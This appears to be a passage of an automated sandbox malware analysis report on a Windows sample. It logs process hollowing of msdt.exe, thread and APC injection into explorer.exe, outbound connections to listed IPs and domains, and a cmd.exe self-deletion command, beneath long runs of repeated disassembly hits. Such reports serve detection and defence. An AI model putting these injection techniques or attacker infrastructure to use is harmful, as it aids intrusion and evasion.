          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE3D34 mov eax, dword ptr fs:[00000030h]10_2_04CE3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDAD30 mov eax, dword ptr fs:[00000030h]10_2_04CDAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8ED6 mov eax, dword ptr fs:[00000030h]10_2_04DA8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D18EC7 mov eax, dword ptr fs:[00000030h]10_2_04D18EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8FEC0 mov eax, dword ptr fs:[00000030h]10_2_04D8FEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D036CC mov eax, dword ptr fs:[00000030h]10_2_04D036CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE76E2 mov eax, dword ptr fs:[00000030h]10_2_04CE76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D016E0 mov ecx, dword ptr fs:[00000030h]10_2_04D016E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6FE87 mov eax, dword ptr fs:[00000030h]10_2_04D6FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D546A7 mov eax, dword ptr fs:[00000030h]10_2_04D546A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]10_2_04DA0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]10_2_04DA0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]10_2_04DA0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]10_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]10_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]10_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]10_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]10_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE7E41 mov eax, dword ptr fs:[00000030h]10_2_04CE7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AE44 mov eax, dword ptr fs:[00000030h]10_2_04D9AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AE44 mov eax, dword ptr fs:[00000030h]10_2_04D9AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE766D mov eax, dword ptr fs:[00000030h]10_2_04CE766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]10_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]10_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]10_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]10_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFAE73 mov eax, dword ptr fs:[00000030h]10_2_04CFAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A61C mov eax, dword ptr fs:[00000030h]10_2_04D0A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A61C mov eax, dword ptr fs:[00000030h]10_2_04D0A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC600 mov eax, dword ptr fs:[00000030h]10_2_04CDC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC600 mov eax, dword ptr fs:[00000030h]10_2_04CDC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC600 mov eax, dword ptr fs:[00000030h]10_2_04CDC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D08E00 mov eax, dword ptr fs:[00000030h]10_2_04D08E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D91608 mov eax, dword ptr fs:[00000030h]10_2_04D91608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8FE3F mov eax, dword ptr fs:[00000030h]10_2_04D8FE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDE620 mov eax, dword ptr fs:[00000030h]10_2_04CDE620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D137F5 mov eax, dword ptr fs:[00000030h]10_2_04D137F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57794 mov eax, dword ptr fs:[00000030h]10_2_04D57794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57794 mov eax, dword ptr fs:[00000030h]10_2_04D57794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57794 mov eax, dword ptr fs:[00000030h]10_2_04D57794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE8794 mov eax, dword ptr fs:[00000030h]10_2_04CE8794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEEF40 mov eax, dword ptr fs:[00000030h]10_2_04CEEF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEFF60 mov eax, dword ptr fs:[00000030h]10_2_04CEFF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8F6A mov eax, dword ptr fs:[00000030h]10_2_04DA8F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6FF10 mov eax, dword ptr fs:[00000030h]10_2_04D6FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6FF10 mov eax, dword ptr fs:[00000030h]10_2_04D6FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA070D mov eax, dword ptr fs:[00000030h]10_2_04DA070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA070D mov eax, dword ptr fs:[00000030h]10_2_04DA070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFF716 mov eax, dword ptr fs:[00000030h]10_2_04CFF716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A70E mov eax, dword ptr fs:[00000030h]10_2_04D0A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A70E mov eax, dword ptr fs:[00000030h]10_2_04D0A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0E730 mov eax, dword ptr fs:[00000030h]10_2_04D0E730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD4F2E mov eax, dword ptr fs:[00000030h]10_2_04CD4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD4F2E mov eax, dword ptr fs:[00000030h]10_2_04CD4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]10_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov ecx, dword ptr fs:[00000030h]10_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]10_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]10_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]10_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]10_2_04D6B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD58EC mov eax, dword ptr fs:[00000030h]10_2_04CD58EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9080 mov eax, dword ptr fs:[00000030h]10_2_04CD9080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D53884 mov eax, dword ptr fs:[00000030h]10_2_04D53884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D53884 mov eax, dword ptr fs:[00000030h]10_2_04D53884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0F0BF mov ecx, dword ptr fs:[00000030h]10_2_04D0F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0F0BF mov eax, dword ptr fs:[00000030h]10_2_04D0F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0F0BF mov eax, dword ptr fs:[00000030h]10_2_04D0F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]10_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]10_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]10_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]10_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]10_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D020A0 mov eax, dword ptr fs:[00000030h]10_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D190AF mov eax, dword ptr fs:[00000030h]10_2_04D190AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF0050 mov eax, dword ptr fs:[00000030h]10_2_04CF0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF0050 mov eax, dword ptr fs:[00000030h]10_2_04CF0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D92073 mov eax, dword ptr fs:[00000030h]10_2_04D92073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA1074 mov eax, dword ptr fs:[00000030h]10_2_04DA1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57016 mov eax, dword ptr fs:[00000030h]10_2_04D57016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57016 mov eax, dword ptr fs:[00000030h]10_2_04D57016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D57016 mov eax, dword ptr fs:[00000030h]10_2_04D57016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA4015 mov eax, dword ptr fs:[00000030h]10_2_04DA4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA4015 mov eax, dword ptr fs:[00000030h]10_2_04DA4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]10_2_04CEB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]10_2_04CEB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]10_2_04CEB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEB02A mov eax, dword ptr fs:[00000030h]10_2_04CEB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]10_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]10_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]10_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]10_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0002D mov eax, dword ptr fs:[00000030h]10_2_04D0002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]10_2_04CDB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]10_2_04CDB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB1E1 mov eax, dword ptr fs:[00000030h]10_2_04CDB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D641E8 mov eax, dword ptr fs:[00000030h]10_2_04D641E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02990 mov eax, dword ptr fs:[00000030h]10_2_04D02990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFC182 mov eax, dword ptr fs:[00000030h]10_2_04CFC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0A185 mov eax, dword ptr fs:[00000030h]10_2_04D0A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]10_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]10_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]10_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D551BE mov eax, dword ptr fs:[00000030h]10_2_04D551BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D061A0 mov eax, dword ptr fs:[00000030h]10_2_04D061A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D061A0 mov eax, dword ptr fs:[00000030h]10_2_04D061A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D569A6 mov eax, dword ptr fs:[00000030h]10_2_04D569A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFB944 mov eax, dword ptr fs:[00000030h]10_2_04CFB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFB944 mov eax, dword ptr fs:[00000030h]10_2_04CFB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDC962 mov eax, dword ptr fs:[00000030h]10_2_04CDC962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB171 mov eax, dword ptr fs:[00000030h]10_2_04CDB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDB171 mov eax, dword ptr fs:[00000030h]10_2_04CDB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9100 mov eax, dword ptr fs:[00000030h]10_2_04CD9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9100 mov eax, dword ptr fs:[00000030h]10_2_04CD9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9100 mov eax, dword ptr fs:[00000030h]10_2_04CD9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0513A mov eax, dword ptr fs:[00000030h]10_2_04D0513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0513A mov eax, dword ptr fs:[00000030h]10_2_04D0513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]10_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]10_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]10_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov eax, dword ptr fs:[00000030h]10_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF4120 mov ecx, dword ptr fs:[00000030h]10_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02ACB mov eax, dword ptr fs:[00000030h]10_2_04D02ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02AE4 mov eax, dword ptr fs:[00000030h]10_2_04D02AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0D294 mov eax, dword ptr fs:[00000030h]10_2_04D0D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0D294 mov eax, dword ptr fs:[00000030h]10_2_04D0D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0FAB0 mov eax, dword ptr fs:[00000030h]10_2_04D0FAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]10_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]10_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]10_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]10_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD52A5 mov eax, dword ptr fs:[00000030h]10_2_04CD52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]10_2_04CEAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CEAAB0 mov eax, dword ptr fs:[00000030h]10_2_04CEAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D64257 mov eax, dword ptr fs:[00000030h]10_2_04D64257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9EA55 mov eax, dword ptr fs:[00000030h]10_2_04D9EA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]10_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]10_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]10_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD9240 mov eax, dword ptr fs:[00000030h]10_2_04CD9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D1927A mov eax, dword ptr fs:[00000030h]10_2_04D1927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8B260 mov eax, dword ptr fs:[00000030h]10_2_04D8B260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8B260 mov eax, dword ptr fs:[00000030h]10_2_04D8B260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8A62 mov eax, dword ptr fs:[00000030h]10_2_04DA8A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE8A0A mov eax, dword ptr fs:[00000030h]10_2_04CE8A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AA16 mov eax, dword ptr fs:[00000030h]10_2_04D9AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9AA16 mov eax, dword ptr fs:[00000030h]10_2_04D9AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CF3A1C mov eax, dword ptr fs:[00000030h]10_2_04CF3A1C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDAA16 mov eax, dword ptr fs:[00000030h]10_2_04CDAA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDAA16 mov eax, dword ptr fs:[00000030h]10_2_04CDAA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov eax, dword ptr fs:[00000030h]10_2_04CD5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov ecx, dword ptr fs:[00000030h]10_2_04CD5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov eax, dword ptr fs:[00000030h]10_2_04CD5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CD5210 mov eax, dword ptr fs:[00000030h]10_2_04CD5210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D14A2C mov eax, dword ptr fs:[00000030h]10_2_04D14A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D14A2C mov eax, dword ptr fs:[00000030h]10_2_04D14A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D553CA mov eax, dword ptr fs:[00000030h]10_2_04D553CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D553CA mov eax, dword ptr fs:[00000030h]10_2_04D553CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CFDBE9 mov eax, dword ptr fs:[00000030h]10_2_04CFDBE9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]10_2_04D003E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]10_2_04D003E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]10_2_04D003E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]10_2_04D003E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]10_2_04D003E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D003E2 mov eax, dword ptr fs:[00000030h]10_2_04D003E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D0B390 mov eax, dword ptr fs:[00000030h]10_2_04D0B390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE1B8F mov eax, dword ptr fs:[00000030h]10_2_04CE1B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CE1B8F mov eax, dword ptr fs:[00000030h]10_2_04CE1B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D02397 mov eax, dword ptr fs:[00000030h]10_2_04D02397
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9138A mov eax, dword ptr fs:[00000030h]10_2_04D9138A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D8D380 mov ecx, dword ptr fs:[00000030h]10_2_04D8D380
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04BAD mov eax, dword ptr fs:[00000030h]10_2_04D04BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04BAD mov eax, dword ptr fs:[00000030h]10_2_04D04BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D04BAD mov eax, dword ptr fs:[00000030h]10_2_04D04BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA5BA5 mov eax, dword ptr fs:[00000030h]10_2_04DA5BA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04DA8B58 mov eax, dword ptr fs:[00000030h]10_2_04DA8B58
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDDB40 mov eax, dword ptr fs:[00000030h]10_2_04CDDB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDF358 mov eax, dword ptr fs:[00000030h]10_2_04CDF358
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D03B7A mov eax, dword ptr fs:[00000030h]10_2_04D03B7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D03B7A mov eax, dword ptr fs:[00000030h]10_2_04D03B7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04CDDB60 mov ecx, dword ptr fs:[00000030h]10_2_04CDDB60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04D9131B mov eax, dword ptr fs:[00000030h]10_2_04D9131B
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.111.47.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.yunlimall.com
          Source: C:\Windows\explorer.exeDomain query: www.thriveglucose.com
          Source: C:\Windows\explorer.exeDomain query: www.ololmychartlogin.com
          Source: C:\Windows\explorer.exeNetwork Connect: 13.59.53.244 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kce0728com.net
          Source: C:\Windows\explorer.exeDomain query: www.cleanxcare.com
          Source: C:\Windows\explorer.exeDomain query: www.ruhexuangou.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.painhut.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 212.32.237.92 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.essentiallyourscandles.com
          Source: C:\Windows\explorer.exeDomain query: www.brunoecatarina.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.82.57.32 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.swayam-moj.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.195.117.147 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 78.31.67.91 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.advancedaccessapplications.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 11E0000Jump to behavior
          Source: C:\Users\user\Desktop\DNPr7t0GMY.exeProcess created: C:\Users\user\Desktop\DNPr7t0GMY.exe C:\Users\user\Desktop\DNPr7t0GMY.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DNPr7t0GMY.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.251612925.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.251901669.0000000001980000.00000002.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.233903760.0000000006860000.00000004.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.251901669.0000000001980000.00000002.00000001.sdmp, msdt.exe, 0000000A.00000002.480683783.0000000003560000.00000002.00000001.sdmpBinary or memory string: Progman
